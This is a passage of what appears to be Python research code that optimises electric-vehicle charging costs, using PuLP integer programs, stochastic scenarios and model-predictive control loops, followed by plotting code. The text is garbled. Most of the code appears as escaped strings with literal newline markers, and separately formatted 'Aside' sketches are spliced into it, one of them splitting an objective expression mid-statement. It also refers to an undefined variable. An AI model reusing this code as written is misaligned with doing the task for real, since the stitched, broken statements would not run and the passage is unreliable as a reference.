r=1, verbose=False):\n # Init problem\n prob = LpProblem(\"mpc_DumbCharge\", LpMinimize)\n\n # Init variables\n x = LpVariable.dicts(\"x\", tvec, lowBound=0, upBound=xmax, cat='Continuous')\n b = LpVariable.dicts(\"b\", np.append(tvec,T+1), lowBound=0, upBound=5000, cat='Continuous')\n i = LpVariable.dicts(\"i\", tvec, lowBound=0, upBound=1, cat='Binary')\n s = LpVariable.dicts(\"s\", tvec, lowBound=0, upBound=0.25*bmax, cat='Continuous')\n #s2 = LpVariable.dicts(\"s2\", tvec, lowBound=0, upBound=bmin, cat='Continuous')\n s2 = {i: LpVariable(\"s2_\"+str(i), lowBound=0, upBound=ub, cat='Continuous') for i, ub in enumerate(bmin)}\n b[0] = b0\n M = 10**6\n\n # Objective\n prob += lpSum([c[t]*x[t] for t in tvec] - c_tilde * (b[T+1]-b[0]) + [100*c_tilde*(s[t]+s2[t+1]) for t in tvec])\n\n # Constraints\n for t in tvec:\n prob += b[t+1] == 
b[t] + x[t]*r - u[t]\n        prob += b[t+1] >= bmin[t+1] - s2[t+1]\n        prob += b[t+1] <= bmax + s[t]\n        \n        ######## DUMB CHARGE ########\n        ########## Implement in OR-terms: x[t] == min(z[t]*xmax, bmax-b[t]) ==> min(z[t]*xmax, bmax+s[t]-b[t]-u[t] / r)\n        # Ensure i[t] == 1, if z[t]*xmax < bmax-b[t] (i.e. i=1 when there is plenty of room left in the battery)\n        prob += (bmax+s[t]-b[t])/r - z[t]*xmax - M*i[t] <= 0 # Consider adding u[t] here, because in this analysis power is consumed while charging. In practice it would be 0 (or close to 0) and could be dropped from the model. Why including it is not cheating: DumbCharge charges at max speed until full anyway, so if consumption is spread linearly over the hour, it is effectively the same as knowing u[t] for that hour.\n        prob += z[t]*xmax - (bmax+s[t]-b[t])/r - M*(1-i[t]) <= 0\n\n        # Use i[t] to constrain x[t]\n        prob += x[t] <= z[t]*xmax\n        prob += x[t] <= (bmax+s[t]-b[t]) / r # s[t] is added to avoid forcing x[t] negative when b[t] is slightly above bmax\n        prob += x[t] >= (z[t]*xmax - M*(1-i[t])) # i = 1 means charging at max capacity\n        prob += x[t] >= (bmax+s[t]-b[t]) / r - M*i[t] # i = 0 means we can only charge the remainder up to 80 or 100 % SOC\n        #prob += i[t] <= z[t]\n\n    # Solve problem\n    prob.solve(PULP_CBC_CMD(gapAbs = 0.01, msg=verbose))\n\n    # Return objective without penalization\n    prob += lpSum([c[t]*x[t] for t in tvec] - c_tilde * (b[T+1]-b[0]))\n\n    # Return results\n    return(prob, x, b)\n\n### Stochastic programming functions. Maintained here\ndef StochasticProgram(n_scenarios, b0, bmax, bmin, xmax, c_d, c_s, c_tilde, u_t_true, u_forecast, z, tvec, r, l, previous_solution=None, KMweights=None, verbose=True):\n    \"\"\"\n    Solves the 2-stage stochastic program for a given time horizon T, and returns the optimal solution.\n    l: Length of deterministic prices\n    O: Number of scenarios (Omega)\n    \"\"\"\n\n    if KMweights is None:\n        KMweights = np.repeat(1/n_scenarios, n_scenarios)\n    O, K = c_s.shape\n    tvec_d = tvec[0:l] # Deterministic part\n    tvec_s = tvec[l:] # Stochastic part\n    \n    ### Init problem\n    prob = LpProblem(\"StochEcoMPC\", LpMinimize)\n\n    ### Init variables\n    x_d = LpVariable.dicts(\"x_d\", tvec_d, lowBound=0, upBound=xmax, cat='Continuous')\n    x_s = LpVariable.dicts(\"x_s\", [(t,o) for o in range(O) for t in tvec_s], lowBound=0, upBound=xmax, cat='Continuous') #xs_i,omega\n    b = LpVariable.dicts(\"b\", [(t,o) for o in range(O) for t in np.append(tvec,tvec[-1]+1)], lowBound=0, upBound=5000, cat='Continuous')\n    s = LpVariable.dicts(\"s\", [(t,o) for o in range(O) for t in tvec], lowBound=0, upBound=0.25*bmax, cat='Continuous') # Add penalizing slack for violating bmax=80%, but still remain below 100%\n    s2 = {(i, o): LpVariable(\"s2_(\"+str(i)+\",_\"+str(o)+\")\", lowBound=0, upBound=ub) for o in range(O) for i, ub in enumerate(bmin)}\n    # Set initial SOC to b0 for all scenarios o\n    for o in range(O): b[(0,o)] = b0\n\n    # # warm-start\n    # if (previous_solution is not None) and (l > 1):\n    #     x_d_prev = previous_solution[0]\n    #     x_s_prev = previous_solution[1]\n    #     for t in range(1, len(x_d_prev)):\n    #         if t < l:\n    #             x_d[t-1].setInitialValue(round(x_d_prev[t].value(),5))\n    #     for t in range(l+1, l+int(len(x_s_prev)/O)):\n    #         if t <= h:\n    #             for o in range(O):\n    #                 x_s[t-1,o].setInitialValue(round(x_s_prev[(t,o)].value(), 5))\n\n    ### Objective\n    prob += lpSum([c_d[t]*x_d[t] for t in tvec_d]) + lpSum([KMweights[o] * c_s[o,t]*x_s[t,o] for t in tvec_s for o in range(O)]) - lpSum([KMweights[o] * c_tilde * 
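# Aside: a standalone sketch of the big-M construction DumbCharge uses above to encode
# x = min(a, b) in a MILP: the binary i flags the smaller argument, and M must dominate
# any feasible |a - b|. The values of a and b are illustrative.
from pulp import LpProblem, LpMinimize, LpVariable, value, PULP_CBC_CMD

a, b, M = 11.0, 7.0, 10**6
m = LpProblem("x_eq_min_a_b", LpMinimize)
x = LpVariable("x")
i = LpVariable("i", cat="Binary")
m += x                                # any objective; the constraints pin x
m += a - b - M * i <= 0               # a > b  forces  i = 1
m += b - a - M * (1 - i) <= 0         # b > a  forces  i = 0
m += x <= a
m += x <= b
m += x >= b - M * (1 - i)             # i = 1: x is pinned to b
m += x >= a - M * i                   # i = 0: x is pinned to a
m.solve(PULP_CBC_CMD(msg=0))
assert abs(value(x) - min(a, b)) < 1e-6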
((b[tvec[-1],o]) - b[0,o]) for o in range(O)]) + lpSum([KMweights[o] * 100 *c_tilde*(s[t,o]+s2[t+1,o]) for t in tvec for o in range(O)])\n\n ### Constraints\n # Deterministic part\n for t in tvec_d:\n for o in range(O):\n prob += b[(t+1,o)] == b[(t,o)] + x_d[t]*r - u_forecast[t]\n prob += b[(t+1,o)] >= bmin[t+1] - s2[t+1,o]\n prob += b[(t+1,o)] <= bmax + s[t,o]\n prob += x_d[t] <= xmax * z[t]\n prob += x_d[t] >= 0\n\n # Stochastic part$\n for t in tvec_s:\n for o in range(O):\n prob += b[(t+1,o)] == b[(t,o)] + x_s[(t,o)]*r - u_forecast[t]\n prob += b[(t+1,o)] >= bmin[t+1] - s2[t+1,o]\n prob += b[(t+1,o)] <= bmax + s[t,o]\n prob += x_s[(t,o)] <= xmax * z[t]\n prob += x_s[(t,o)] >= 0\n\n # Solve problem\n if verbose:\n prob.solve(PULP_CBC_CMD(warmStart=(previous_solution != None)))\n else:\n prob.solve(PULP_CBC_CMD(msg=0, warmStart= (previous_solution != None)))\n print(\"Status:\", LpStatus[prob.status])\n\n # Update b1 with actual use (relative to what we chose to charge) (Should be sufficient only to update b(1,0))\n for o in range(O):\n b[(1,o)] = b[(0,o)] + value(x_d[0])*r - u_t_true\n prob.assignVarsVals({'b_(1,_'+str(o)+')': b[1,o]})\n assert b[1,o] == value(b[1,0]), \"b(1,o) is not equal to value(b(1,0))\"\n \n # Return results\n return(prob, x_d, b, x_s)\n\ndef getMediods(scenarios, n_clusters):\n # Perform KMedoids clustering\n kmedoids = KMedoids(n_clusters=n_clusters, random_state=0).fit(scenarios)\n # Extract mediods\n mediods = scenarios[kmedoids.medoid_indices_]\n # Extract proportion of scenarios in each cluster\n cluster_proportions = np.zeros(n_clusters)\n for i in range(n_clusters):\n cluster_proportions[i] = np.mean(kmedoids.labels_ == i)\n # Return mediods and cluster proportions\n return(mediods, cluster_proportions)\n\n# Maintained here\ndef MultiDayStochastic(scenarios, n_scenarios, dfp, dft, dfspot, u, uhat, z, h, b0, bmax, bmin, xmax, c_tilde, r, KMweights=None, maxh=6*24, perfectForesightUse=False, verbose=False):\n # Study from first hour of prediciton up to and including the latest hour of known spot price\n L = len(u) - (maxh+1)\n H = h; # Store h\n\n # Init\n flag_AllFeasible = True\n prev_sol = None\n tvec = np.arange(0,h+1)\n B = np.empty((L+1)); B[:] = np.nan; B[0] = b0;\n X = np.empty((L)); X[:] = np.nan\n c = dfspot['TruePrice'].to_numpy()\n costs = 0\n k = 0\n # E.g. 
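# Aside: a self-contained sketch of the scenario reduction getMediods() performs above --
# cluster many sampled price paths with k-medoids and keep one representative path per
# cluster plus its empirical weight (the KMweights fed to StochasticProgram). The data
# here is synthetic.
import numpy as np
from sklearn_extra.cluster import KMedoids

rng = np.random.default_rng(0)
paths = rng.normal(size=(200, 24))               # 200 synthetic 24-hour price paths
km = KMedoids(n_clusters=5, random_state=0).fit(paths)
mediods = paths[km.medoid_indices_]              # 5 representative paths
weights = np.array([np.mean(km.labels_ == k) for k in range(5)])
assert np.isclose(weights.sum(), 1.0)            # weights form a distribution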
k, i, j, l, b0 = 163, 163, 0, 17, 60.17055119267742\n \n # For each Atime\n for i in range(len(dfp)):\n h = H\n l = dfp['l_hours_avail'][i]+1\n # For each hour until next forecast\n for j in range(dfp['Atime_diff'][i]):\n flag_OutOfForecasts = False\n if k%50 == 0:\n print(\"k = \" + str(k) + \" of \" + str(L-1))\n \n # Patch holes in forecasts (1 out of 2)\n l = l-1\n if l < 12: # New prices are known at 13.00\n l = 35\n\n # When re-using the same forecast, shorten the horizon\n if j>0:\n h = max(h-1, l-1) # h = h-1 but don't go below the DayAhead horizon\n h = min(h, L-k) # Allow control to know that experiment is ending.\n tvec = np.arange(0,h+1)\n #print(\"i,j,k,l,h = \", i,j,k,l,h)\n\n # Extract forecasts from t=0..h\n c_forecast = dfp.iloc[i, (j+3):(3+H+1)].to_numpy();\n \n # Patch holes in forecasts (2 out of 2) - use known prices\n #c_forecast[:min(l,h+1)] = dft.iloc[i, (j+3):(3+H+1)].to_numpy()[:min(l,h+1)]\n try:\n c_forecast[:min(l,h+1)] = c[k:k+min(l,h+1)]\n except:\n # Edge case: If c_forecast has become shorter than known hours: fix\n if min(l,h+1) > len(c_forecast):\n c_forecast = c[k:k+min(l,h+1)]\n flag_OutOfForecasts = True\n print(\"flag: Out Of Forecasts\")\n \n # Extract deterministic and stochastic prices\n if KMweights is None:\n idx = np.random.randint(0, scenarios.shape[0]-n_scenarios)\n scenarioExtract = scenarios[idx:idx+n_scenarios, :] # Subset new scenarios every iteration\n else:\n scenarioExtract = scenarios\n \n # Extract prices\n c_d = c_forecast[:l] # Deterministic part\n #print(\"k = \" + str(k) + \" of \" + str(L-1) + \" i = \"+str(i),\" - l = \" + str(l) + \" - h = \" + str(h) + \" - j = \" + str(j) + \" - c_d = \" + str(c_d) + \" - c_forecast = \" + str(c_forecast))\n if not flag_OutOfForecasts:\n c_s = c_forecast + scenarioExtract[:, j:(H+1)] # Stochastic part\n else:\n c_s = c_forecast + np.zeros((n_scenarios, len(c_forecast)))\n c_s[c_s < 0] = 0 # Truncate cost_stochastic to assume non-negative electricity spot prices. 
Conclussion: Performed better.\n\n # Find relevant input at the specific hours of flexibility\n tvec_i = np.arange(k, k+h+1)\n z_i = z[tvec_i]\n bmin_i = bmin[np.append(tvec_i, tvec_i[-1]+1)]\n\n u_forecast = np.repeat(uhat[k], h+1)\n if perfectForesightUse:\n u_forecast = u[tvec_i]\n u_t_true = u[k]\n\n # Solve\n if z_i[0] != 0: # Plugged in\n prob, x_d, b, x_s = StochasticProgram(n_scenarios, b0, bmax, bmin_i, xmax, c_d, c_s, c_tilde, u_t_true, u_forecast, z_i, tvec, r, l, previous_solution=None, KMweights=KMweights, verbose=verbose)\n if LpStatus[prob.status] != 'Optimal':\n flag_AllFeasible = False\n print(\"\\n\\nPlugged in = \", z[k],\"=\", z_i[0])\n print(\"bmin = \", round(bmin[k]), round(bmin_i[0]), \"bmin_t+1 = \", round(bmin_i[1]))\n print(\"u_true, u_forecast = \", u[k], u_forecast[0])\n print(\"b0 = \", b0, \"b1 = \", value(b[1,0]))\n print(\"x = \", value(x_d[0]), \"Trying \", bmin[k+1],\"<=\", r*value(x_d[0])+b[0,0]-u[k], \" <= \", bmax)\n print(\"Infeasible at k = \" + str(k) + \" with i = \" + str(i) + \" and j = \" + str(j), \" and l = \" + str(l))\n print(\"\\n\\n\\n\")\n x0 = value(x_d[0])\n b1 = value(b[1,0])\n elif z_i[0] == 0: # Not plugged in\n x0 = 0\n b1 = b0 + x0*r - u_t_true\n\n # Implement/store only the first step, and re-run in next hour\n X[k]=x0; # Amount charged in the now-hour\n B[k+1]=b1; # Battery level after the now-hsecour / beggining of next hour\n costs += x0 * c[k]; # Cost of charging in the now-hour\n b0 = b1 # Next SOC start is the current SOC\n k += 1\n #prev_sol = [x_d, x_s] # For warm-start\n\n # THE END\n if k == L:\n # Costs\n total_cost = np.sum(costs) - c_tilde * (B[-1] - B[0])\n\n # Any non-feasibilities\n if any(B<0) or any(B > 1.25*bmax):\n flag_AllFeasible = False\n\n # Tie results intro prob\n prob = {'x':X, 'b':B, 'u':u[0:L], 'c':c[0:L], 'z':z[0:L], 'objective':total_cost}\n return(prob, X, B, flag_AllFeasible)\n\n# Maintained here (from mpc3_montadata.py)\ndef MultiDay(dfp, dft, dfspot, u, uhat, z, h, b0, bmax, bmin, xmax, c_tilde, r, DayAhead=False, maxh=6*24, perfectForesightUse=False):\n # Study from first hour of prediciton up to and including the latest hour of known spot price\n L = len(u) - (maxh+1) # Run through all data, but we don't have forecasts of use/plug-in yet.\n # maxh = maximum h of interest ==> to allow comparison on exact same data for different horizons h.\n H = h # store h\n # Init\n flag_AllFeasible = True\n tvec = np.arange(0,h+1)\n B = np.empty((L+1)); B[:] = np.nan; B[0] = b0;\n X = np.empty((L)); X[:] = np.nan\n c = dfspot['TruePrice'].to_numpy()\n costs = 0\n k = 0\n\n # For each Atime\n for i in range(len(dfp)):\n h = H\n tvec = np.arange(0,h+1)\n flagForecastHole = 0\n l = dfp['l_hours_avail'][i]+1\n # For each hour until next forecast\n for j in range(dfp['Atime_diff'][i]):\n if k%50 == 0:\n print(\"k = \" + str(k) + \" of \" + str(L-1))\n \n # Patch holes in forecasts (1 out of 2)\n l = l-1\n if l < 12: # New prices are known at 13.00\n l = 35\n flagForecastHole += 1\n\n if DayAhead: # If Day-Ahead Smart Charge, disregard h input and use h = l_hours_avail-1\n h = l-1\n #H = dfp['l_hours_avail'][i]-1\n H = dfp['l_hours_avail'][i]-1 + 24*flagForecastHole\n #print(\"i,j,k,l,h = \", i,j,k,l,h)\n\n # When re-using the same forecast, shorten the horizon\n if (j>0) and (not DayAhead):\n h = max(h-1, l-1) # h = h-1 but don't go below the DayAhead horizon\n h = min(h, L-k) # Allow control to know that experiment is ending.\n tvec = np.arange(0,h+1)\n\n # Extract forecasts from t=0..h\n #c_forecast = 
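# Aside: stripped of the forecast bookkeeping, MultiDayStochastic()/MultiDay() above are a
# receding-horizon (MPC) loop: plan h hours ahead, commit only the first hour, advance the
# battery with the *realized* use, then re-plan. A skeleton of that control pattern;
# solve_horizon here stands in for any of the optimizers in this file.
def receding_horizon(solve_horizon, b0, u_true, h, r=1.0):
    b, X = b0, []
    for k in range(len(u_true) - h):
        x_plan = solve_horizon(b, k, h)   # plan charge for hours k..k+h
        x0 = x_plan[0]                    # implement only the first decision
        X.append(x0)
        b = b + r * x0 - u_true[k]        # state update with realized use
    return X, b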
dfp.iloc[i, (j+3):(j+3+h+1)].to_numpy()\n c_forecast = dfp.iloc[i, (j+3):(3+H+1)].to_numpy()\n \n # Patch holes in forecasts (2 out of 2) - use known prices\n #c_forecast[:min(l,h+1)] = dft.iloc[i, (j+3):(3+H+1)].to_numpy()[:min(l,h+1)]\n #print(\"k = \" + str(k) + \" of \" + str(L-1) + \" (h = \" + str(h) + \") i=\" + str(i) + \" j=\" + str(j) + \" l=\" + str(l) + \" c_forecast = \" + str(c_forecast))\n try:\n c_forecast[:min(l,h+1)] = c[k:k+min(l,h+1)]\n except:\n # Edge case: If c_forecast has become shorter than known hours: fix\n if min(l,h+1) > len(c_forecast):\n c_forecast = c[k:k+min(l,h+1)]\n\n \n # Find relevant input at the specific hours of flexibility\n tvec_i = np.arange(k, k+h+1)\n z_i = z[tvec_i] # Assuming known plug-in times.\n bmin_i = bmin[np.append(tvec_i, tvec_i[-1]+1)]\n\n u_forecast = np.repeat(uhat[k], h+1) # = actually uhat[k-1], but a 0 has been appended as first value.\n if perfectForesightUse:\n u_forecast = u[tvec_i]\n u_t_true = u[k]\n \n # Solve\n if z_i[0] != 0:\n prob, x, b = ImperfectForesight(b0, bmax, bmin_i, xmax, c_forecast, c_tilde, u_t_true, u_forecast, z_i, h, tvec, r, verbose=False) # Yes, it is tvec=0..h, NOT tvec_i\n #print(\"Status:\", LpStatus[prob.status])\n if LpStatus[prob.status] != 'Optimal':\n flag_AllFeasible = False\n print(\"\\n\\nPlugged in = \", z[k],\"=\", z_i[0])\n print(\"bmin = \", round(bmin[k]), round(bmin_i[0]), \"bmin_t+1 = \", round(bmin_i[1]))\n print(\"u = \", u[k], u_forecast[0])\n print(\"b0 = \", b0, \"b1 = \", value(b[1]))\n print(\"x = \", value(x[0]), \"Trying \", bmin[k+1],\"<=\", r*value(x[0])+b0-u[k], \" <= \", bmax)\n print(\"Infeasible at k = \" + str(k) + \" with i = \" + str(i) + \" and j = \" + str(j))\n print(\"\\n\\n\\n\")\n x0 = value(x[0])\n b1 = value(b[1])\n elif z_i[0] == 0: # Not plugged in\n x0 = 0\n b1 = b0 + x0*r - u_t_true\n\n # Implement/store only the first step, and re-run in next hour\n X[k]=x0; # Amount charged in the now-hour\n B[k+1]=b1; # Battery level after the now-hour / beggining of next hour\n costs += x0 * c[k]; # Cost of charging in the now-hour\n #print(c[k+0], dft.iloc[i,j+3+0], c_forecast[0+0], dfp.iloc[i,j+3+0], j, l)\n b0 = b1 # Next SOC start is the current SOC\n k += 1\n \n # THE END\n if k == L:\n # Costs\n total_cost = np.sum(costs) - c_tilde * (B[-1] - B[0])\n \n # Any non-feasibilities\n if any(B<0) or any(B > 1.25*bmax):\n flag_AllFeasible = False\n\n # Tie results intro prob\n prob = {'x':X, 'b':B, 'u':u[0:L], 'c':c[0:L], 'z':z[0:L], 'objective':total_cost}\n return(prob, X, B, flag_AllFeasible)\n\n# Maitained here\ndef ExtractEVdataForMPC(dfv, z_var, u_var, uhat_var, bmin_var, p, data=''):\n # Read the dfp and dft and dfspot --- This section can be moved out of the function to save a slgiht bit of time\n dfp = pd.read_csv(f'data/MPC-ready/df_{data[:5]}predprices_for_mpc.csv', sep=',', header=0, parse_dates=True)\n dft = pd.read_csv(f'data/MPC-ready/df_{data[:5]}trueprices_for_mpc.csv', sep=',', header=0, parse_dates=True)\n dfspot = pd.read_csv(f'data/spotprice/df_{data[:5]}spot_commontime.csv', sep=',', header=0, parse_dates=True)\n\n dft['Atime'] = pd.to_datetime(dft['Atime'], format='%Y-%m-%d %H:%M:%S')\n dfp['Atime'] = pd.to_datetime(dfp['Atime'], format='%Y-%m-%d %H:%M:%S')\n dfspot['Time'] = pd.to_datetime(dfspot['Time'], format='%Y-%m-%d %H:%M:%S')\n\n # Convert timezone from UTC to Europe/Copenhagen\n dfspot['Time'] = dfspot['Time'].dt.tz_localize('UTC').dt.tz_convert('Europe/Copenhagen')\n dfp['Atime'] = 
dfp['Atime'].dt.tz_localize('UTC').dt.tz_convert('Europe/Copenhagen')\n dft['Atime'] = dft['Atime'].dt.tz_localize('UTC').dt.tz_convert('Europe/Copenhagen')\n\n ####################### Load each element in the list into a dataframe ############################\n starttime = max(dfspot['Time'][0], dfp['Atime'][0], dfv.index[0])\n endtime = min(dfspot['Time'].iloc[-1], dfp['Atime'].iloc[-1], dfv.index[-1])\n\n # Cut dfs to be withing starttime and endtime\n dfspot = dfspot[(dfspot['Time'] >= starttime) & (dfspot['Time'] <= endtime)].reset_index(drop=True)\n #dfp = dfp[(dfp['Atime'] >= starttime) & (dfp['Atime'] <= endtime)].reset_index(drop=True) # The forecast history is the bottleneck\n #dft = dft[(dft['Atime'] >= starttime) & (dft['Atime'] <= endtime)].reset_index(drop=True)\n dfv = dfv[(dfv.index >= starttime) & (dfv.index <= endtime)]\n timestamps = dfv.index\n firsthour = dfv.index[0].hour\n dfp = dfp[(dfp['Atime'] >= timestamps[0]) & (dfp['Atime'] <= timestamps[-1])].reset_index(drop=True) # The forecast history is the bottleneck\n dft = dft[(dft['Atime'] >= timestamps[0]) & (dft['Atime'] <= timestamps[-1])].reset_index(drop=True)\n dfv = dfv.reset_index(drop=False)\n\n ## Print occurences of number of hours between forecasts\n #dfp.Atime_diff.value_counts() # Up to 66 hours between forecasts\n\n ############################################ EXTRACT EV USAGE DATA ####################################################\n # Use\n vehicle_id = dfv['vehicle_id'].unique()[0]\n z = ((dfv[z_var] == 1)*1).to_numpy()\n u = dfv[u_var].to_numpy()\n uhat = dfv[uhat_var].to_numpy()\n uhat = np.append(0, uhat) # For first iter, uhat = 0 => uhat[k] = RollingMean(use)_{i = k-(10*24)...k-1}\n b0 = dfv['SOC'][0]\n r = dfv['efficiency_median'].unique()[0]\n #print(np.sum(u), \"==\", np.sum(dfv['use']))\n # Input\n bmin = dfv[bmin_var].to_numpy()\n # Vehicle parameters\n #bmax = dfv['SOCmax'].median()\n bmax = 0.8*dfv['BatteryCapacity'].median()\n #bmax = np.nanmin([dfv['SOCmax'], dfv['BatteryCapacity']], axis=0)\n xmax = dfv['CableCapacity'].unique()[0]\n c_tilde = np.quantile(dfspot['TruePrice'], p) #min(c[-0:24]) # Value of remaining electricity: lowest el price the past 24h\n\n return dfv, dfspot, dfp, dft, timestamps, z, u, uhat, b0, r, bmin, bmax, xmax, c_tilde, vehicle_id, firsthour, starttime, endtime\n\n# Maintained in dataviz_cardata2.py\ndef PlotChargingProfile(D2=None, dfvehicle=None, var=\"VEHICLE_ID\", id=13267, plot_efficiency_and_SOCmin=True, vertical_hover=False, df_only=False, layout=None, imgtitle=\"PlainProfile_id\"):\n \"\"\"\n Plot the charging profile of a single vehicle\n If df_only is True, then only the dataframe is returned\n If df_vehicle is not None, then only plotting is done\n \"\"\"\n\n if dfvehicle is None:\n D2v = D2[D2[var] == id]\n D2v = D2v.sort_values(by=['CABLE_PLUGGED_IN_AT'])\n id = int(id)\n\n firsttime = D2v['CABLE_PLUGGED_IN_AT'].min().date() - datetime.timedelta(days=1)\n lasttime = max( D2v['PLANNED_PICKUP_AT'].max().date(), D2v['RELEASED_AT'].max().date()) + datetime.timedelta(days=1)\n\n assert len(D2v.capacity_kwh.unique()) == 1, \"Battery capacity changes for vehicle \" + str(id)\n assert len(D2v.max_kw_ac.unique()) == 1, \"Cable capacity changes for vehicle \" + str(id)\n\n # Create a list of times from firsttime to lasttime\n times = pd.date_range(firsttime, lasttime, freq='1h')\n # Create a list of zeros\n zeros = np.zeros(len(times))\n nans = np.full(len(times), np.nan)\n # Create a dataframe with these times and zeros\n df = pd.DataFrame({'time': times, 
'z_plan': zeros, 'z_act': zeros, 'charge': zeros, 'price': nans, 'SOC': nans, 'SOCmin': nans, 'SOCmax': nans, 'BatteryCapacity': nans, 'CableCapacity': nans, 'efficiency': nans})\n df['time'] = df['time'].dt.tz_localize('UTC').dt.tz_convert('Europe/Copenhagen')\n df.z_plan, df.z_act = -1, -1\n # Set the index to be the time\n df = df.set_index('time')\n \n # Vehicle specifics\n df['BatteryCapacity'] = D2v.iloc[-1]['capacity_kwh']\n df['CableCapacity'] = D2v.iloc[-1]['max_kw_ac']\n\n # Loop over all plug-ins and plug-outs # ADD KWH AND SOC RELATIVE TO TIMES\n for i in range(len(D2v)):\n # Set z=1 for all times from plug-in to plug-out\n df.loc[D2v.iloc[i]['CABLE_PLUGGED_IN_AT']:D2v.iloc[i]['PLANNED_PICKUP_AT'], 'z_plan'] = 1 #i=2, ser ud til at være fucked, når CABLE_PLUGGED_IN_AT IKKE er heltal.\n df.loc[D2v.iloc[i]['CABLE_PLUGGED_IN_AT']:D2v.iloc[i]['RELEASED_AT'], 'z_act'] = 1\n\n # Allow semi-discrete plug-in relative to proportion of the hour\n #df.loc[D2v.iloc[i]['CABLE_PLUGGED_IN_AT'], 'z_plan'] = 1\n\n # Extract charge from 'KWHS' and add to df where time is the same\n xt = pd.DataFrame(eval(D2v.iloc[i]['KWHS']))\n if D2v.iloc[i]['KWH'] != round(xt.sum()[1],4):\n print(\"KWH total and sum(kWh_t) does not match for D2v row i=\", i)\n xt['time'] = pd.to_datetime(xt['time'])\n xt['time'] = xt['time'].dt.tz_localize('UTC').dt.tz_convert('Europe/Copenhagen')\n xt = xt.set_index('time')\n df.loc[xt.index, 'charge'] = xt['value']\n\n # Efficiency of charging (ratio of what has been charged to what goes into the battery)\n #if D2v.iloc[i]['KWH'] >= 1: # Only proper charging\n if D2v.iloc[i]['KWH'] > 0:\n df.loc[D2v.iloc[i]['CABLE_PLUGGED_IN_AT']:D2v.iloc[i]['RELEASED_AT'], 'efficiency'] = ((D2v.iloc[i].SOC - D2v.iloc[i].SOC_START) / 100 * D2v.iloc[i]['capacity_kwh']) / D2v.iloc[i].KWH\n\n # Add the right spot prices to df\n if type(D2v.iloc[i]['SPOT_PRICES']) == str and len(eval(D2v.iloc[i]['SPOT_PRICES'])) != 0:\n prices = pd.DataFrame(eval(D2v.iloc[i]['SPOT_PRICES']))\n prices['time'] = pd.to_datetime(prices['time'])\n prices['time'] = prices['time'].dt.tz_localize('UTC').dt.tz_convert('Europe/Copenhagen')\n prices = prices.set_index('time')\n df.loc[prices.index, 'price'] = prices['value']\n \n # Add SOC and convert to kWhs\n df.loc[D2v.iloc[i]['CABLE_PLUGGED_IN_AT'].ceil('H', ambiguous=bool), 'SOC'] = D2v.iloc[i]['SOC_START']/100 * D2v.iloc[i]['capacity_kwh']\n df.loc[D2v.iloc[i]['PLANNED_PICKUP_AT'].floor('H'), 'SOC'] = D2v.iloc[i]['SOC']/100 * D2v.iloc[i]['capacity_kwh']\n\n # Add SOCmax\n df.loc[D2v.iloc[i]['CABLE_PLUGGED_IN_AT']:D2v.iloc[i]['PLANNED_PICKUP_AT'], 'SOCmax'] = D2v.iloc[i]['SOC_LIMIT']/100 * D2v.iloc[i]['capacity_kwh']\n\n # bmin (PURELY INPUT ASSUMPTION)\n min_charged = 0.40 # 40% of battery capacity\n min_alltime = 0.05 # Never go below 5%\n df.loc[D2v.iloc[i]['PLANNED_PICKUP_AT'].floor('H'), 'SOCmin'] = min_charged * df['BatteryCapacity'][i] # Min SOC\n df['SOCmin'] = df['SOCmin'].fillna(min_alltime * df['BatteryCapacity'][i])\n\n\n # If z_plan_everynight and corresponding bmin\n # z_plan_everynight:\n df['z_plan_everynight'] = -1 # df['z_plan_everynight'] = df['z_plan']\n df.loc[(df.index.hour >= 22) | (df.index.hour < 6), 'z_plan_everynight'] = 1\n\n # bmin_everymorning:\n df['SOCmin_everymorning'] = min_alltime * df['BatteryCapacity'] #df['SOCmin_everymorning'] = df['SOCmin']\n df.loc[(df.index.hour == 6), 'SOCmin_everymorning'] = min_charged * df['BatteryCapacity']\n\n # Costs\n df['costs'] = df['price'] * df['charge']\n df = df.merge(df_spot, how='left', 
left_on='time', right_on='time')\n \n # in df['SOC] replace nan with most recent value\n df['SOC_lin'] = df['SOC'].interpolate(method='linear')\n df['SOC'] = df['SOC'].fillna(method='ffill')\n\n # Use\n u = df.SOC.diff().dropna()\n u[u>0] = 0\n u = u.abs()\n df['use'] = u\n\n # Use linearly interpolated SOC\n u_lin = df.SOC_lin.diff().dropna()\n u_lin[u_lin>0] = 0\n u_lin = u_lin.abs()\n df['use_lin'] = u_lin\n # Daily average use\n df['use_dailyaverage'] = df[df['use_lin'] != 0]['use_lin'].mean()\n\n # Calculate 7-day rolling mean of use_lin\n roll_length = 7 # If changed, also change in legend\n df['use_rolling'] = df[df['use_lin'] != 0]['use_lin'].rolling(roll_length*24, min_periods=24).mean()\n df['use_rolling'] = df['use_rolling'].fillna(0)\n # Issues: When subsetting on NOT plugged_in, the roll length of 7*24 steps becomes more than 7 days\n # Issues: Initial 7 days\n\n # Calculate 14-day rolling mean of use (use to estimate use_lin. Without cheating)\n roll_length = 10\n df['use_org_rolling'] = df['use'].rolling(roll_length*24, min_periods=12).mean() # min periods shouldn't be too large or too small\n df['use_org_rolling'] = df['use_org_rolling'].fillna(0) # Estimate u_hat 12 hours with 0\n\n # Exponential moving average\n hlf_life = 2 # days\n df['use_ewm'] = df[df['use_lin'] != 0]['use_lin'].ewm(span=roll_length*24, min_periods=24).mean()\n df['use_ewm'] = df['use_ewm'].fillna(0)\n\n # Median prediction of efficiency\n df['efficiency_median'] = np.median(df['efficiency'].dropna().unique())\n\n # Add vehicle id\n df['vehicle_id'] = id\n\n # Assure non-Nan at crucial places\n if any(df['use'].isna()):\n df = df[~df['use_lin'].isna()]\n print('Rows with NaNs in Use were deleted.')\n\n else:\n df = dfvehicle\n firsttime = df.index[0]\n lasttime = df.index[-1]\n\n #################### START THE PLOTTING ###########################################\n fig = go.Figure([go.Scatter(\n x=df.index,\n y=df['z_act'],\n mode='lines',\n name = \"Plugged-in (actual)\",\n line=dict(\n color='black',\n dash='dot',\n ))])\n\n # Plot the result\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['z_plan'],\n mode='lines',\n name='Plugged-in (planned)',\n line=dict(\n color='black',\n )))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['z_plan_everynight'],\n mode='lines',\n name='Plugged-in (assumption)',\n line=dict(\n color='black',\n )))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['charge'],\n mode='lines',\n name='Charge',\n marker=dict(\n size=10,\n opacity=0.8\n ),\n line=dict(\n color='green',\n width=2\n )\n ))\n\n fig.add_trace(go.Scatter(\n x=df.index,\n y=df['use'],\n mode='lines',\n name='Use',\n line=dict(\n color='red',\n width=2\n )\n ))\n\n 